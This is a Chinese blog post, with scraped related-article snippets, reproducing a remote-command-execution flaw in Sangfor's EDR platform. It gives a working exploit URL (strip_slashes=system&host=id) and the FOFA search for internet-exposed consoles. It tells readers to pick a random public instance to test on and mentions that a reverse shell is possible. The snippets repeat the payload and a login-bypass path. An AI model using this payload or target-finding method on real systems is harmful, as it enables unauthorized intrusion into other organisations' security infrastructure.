深信服EDR终端检测响应平台RCE漏洞复现

最新推荐文章于 2024-08-05 00:00:00 发布
最新推荐文章于 2024-08-05 00:00:00 发布
阅读量4.3k 收藏 9
点赞数 4
分类专栏: 产品 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37777713/article/details/108080211
版权

深信服EDR终端检测响应平台RCE漏洞复现

背景介绍

早在2019年11月份的时候,就有人爆出有人手里屯着深信服某产品的0day。由于是0day,当然没有人见过,也就不了了之。就在昨天,HW正式开始的第一天,有个铁憨憨在某军500人的群聊中放出了深信服EDR的复现过程截图,然后这张图就瞬间在安全圈子内传遍了。
在这里插入图片描述

复现过程

我们在fofa,Zoomeye等一些引擎上搜索关键字就可以找到一大堆对公网开放的EDR。以fofa为例,搜索title="终端检测响应平台"

在这里插入图片描述
接着,随便点开一个进行测试,找到登录界面,确认是深信服的EDR

在这里插入图片描述
然后进行payload填写https://xxx/tool/log/c.php?strip_slashes=system&host=id进行命令执行测试
在这里插入图片描述
当然,命令执行成功,也可以反弹shell进行一系列的操作。

修复建议

暂时没有什么好的修复建议,官方也在加紧开发补丁,所以在此之前,尽量下架所有EDR的产品。

声明:以上内容仅供测试人员进行学习参考,请遵守国家法律法规,禁止以本文章从事违法等相关事宜。

柒玥弯
关注
专栏目录
深信服EDR任意用户登录漏洞复现
afei001
01-19 751
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 2020年HW行动时爆出的深信服EDR漏洞除了前面复现的CNVD-2020-46552深信服EDR远程代码执行漏洞,还有一个EDR任意用户登录漏洞,该漏洞没有CNVD编号。 EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。 2.影响版本 ...
CNVD-2020-46552 深信服EDR命令执行漏洞
nnn2188185的博客
03-22 995
深信服终端监测响应平台EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(RCE)1
08-03
漏洞危害:可执任意系统命令,影响版本:< 最新版本(3.2.21)前说到,不是把梭的 0day 都不叫 0day,所以我们可以对命令执、代码执等漏洞相关敏感函数
深信服 EDR终端检测响应平台 0day RCE 漏洞
Adminxe的博客
08-18 6940
0x01 前言 昨天睡得正香,突然公司售前就呼来电话,问某某edr出现啥问题了,然后我就给他讲了一遍,这个月太忙了,没时间写博客,今天继续来水一篇。 其次大哥来波最真挚的简介: 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统...
解密RCE漏洞:原理剖析、复现与代码审计实战
最新发布
2301_80064376的博客
08-05 905
在网络安全领域,因其严重性和破坏力而备受关注。RCE漏洞允许攻击者在目标系统上执行任意代码,从而掌控整个系统,带来极大的安全风险。理解RCE漏洞的工作原理,并掌握其复现与代码审计技巧,对于提升系统安全性至关重要。本文将深入剖析RCE漏洞的原理,展示如何在实际环境中复现漏洞,并提供详尽的代码审计方法。无论您是网络安全初学者,还是资深开发者,都能从中获得实用的知识和技能。让我们一起解密RCE漏洞,提升我们的安全防护能力。
【HW2020漏洞回顾】深信服EDR两大漏洞(转载)
jianye33的博客
08-25 3110
深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞 【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。漏洞影响版
深信服 EDR终端检测响应平台-RCE-0day漏洞
weixin_43526443的博客
08-20 1382
注:本文仅供学习使用,请勿用于非法操作,后果与作者无关! 0x01 介绍 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。    0x02 RCE 1、本标题译为远程代码执行(remote command/code execute) 2、
深信服 EDR终端检测响应平台RCE漏洞
汗的博客
08-18 1572
payload https://ip+端口/tool/log/c.php?strip_slashes=system&host=whoami 改改host的参数就能rce fofa语法 title="终端检测响应平台" 处理方式 只能暂时下线,貌似问题还比较多,很多要重写 资产基本是国内的,别乱打了,,, ...
CNVD-2020-46552 深信服EDR远程代码执行漏洞复现
afei001
01-19 996
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件和管理平台软件共同组成。2020年08月18日左右检测深信服EDR存在远程代码执行漏洞。该漏洞编号为CNVD-2020-46552。攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。 ...
深信服 EDR终端检测响应平台RCE漏洞代码分析
shy的博客
08-18 7270
一觉醒来,听说护网蓝队捕获了一个深信服的0day,待我看完这部局再分析一下。 EDR简介 终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 fofa语法 title="终端检测响应平台" 漏洞复现 https://ip+端口/tool/log/c.php?strip_slashes=system&host=id 代码分析 将c.php文件拷贝到本地进行分析 $_REQUEST会将接入..
SXF终端检测平台 EDR漏洞复现
xk的博客
08-18 3028
昨天是2020年9月17日,对于做安全的人来说,特别是渗透红蓝对抗这种的,肯定印象极其深刻: 其中不乏有巨佬坐镇的,也有混子摸鱼混经验的,各种操作姿势也是层出不穷: HW期间听闻的各种神操作: 无人机搞Wi-Fi的 挖下水道进内部的 BadUSB钓鱼的 提前半个月混入甲方的 望远镜看密码的 红队伪装蓝队进行木马钓鱼的 利用深信服0day伪装进入的 首页开局一张图片的 美人计的 只有你想不到的,该做的都做了。害。 昨天最令人震惊的就是深信服EDR设备,作为终端检测响应平台,竟然存在漏洞,还如此之
深信服EDR任意用户登录与命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 4480
终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。
某信服EDR任意用户登陆漏洞分析
z1feiyu
08-20 2205
影响范围: EDR <= v3.2.19 漏洞描述: 终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 0x01 漏洞复现 /ui/login.php?user=username username 可能会有变动需要f...
【HW2020漏洞回顾】深信服EDR两大漏洞
wuguojie888的博客
08-20 9119
深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞 【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权..
漏洞复现 || SXF应用交付系统RCE(0Day)
失心少年
08-24 442
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!SXF应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。1.利用如下POC发起POST请求。
深信服 EDR终端检测响应平台漏洞
qax
10-06 511
0x01 前言 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 提示:以下是本篇文章正文内容,下面案例可供参考 0x02 影响范围 fofa关键字搜索:title=”终端检测响应平台” 0x03 远...
【1day】复现深信服应用交付管理系统 login 远程命令执行漏洞和账号密码泄漏漏洞
记录并分享学习安全的知识点..
08-16 812
深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问,导致账号密码泄漏;深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。
"深信服edr终端检测响应平台权限绕过代码审计挖掘与分析
最近收到有关深信服edr终端检测响应平台(_3.2.21版本)存在代码未授权远程命令执行(RCE漏洞的情报,为了对该漏洞进行深入研究,我们进行了代码审计和漏洞挖掘。 前几天,我们从其他社群中得到了一些源代码,并...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值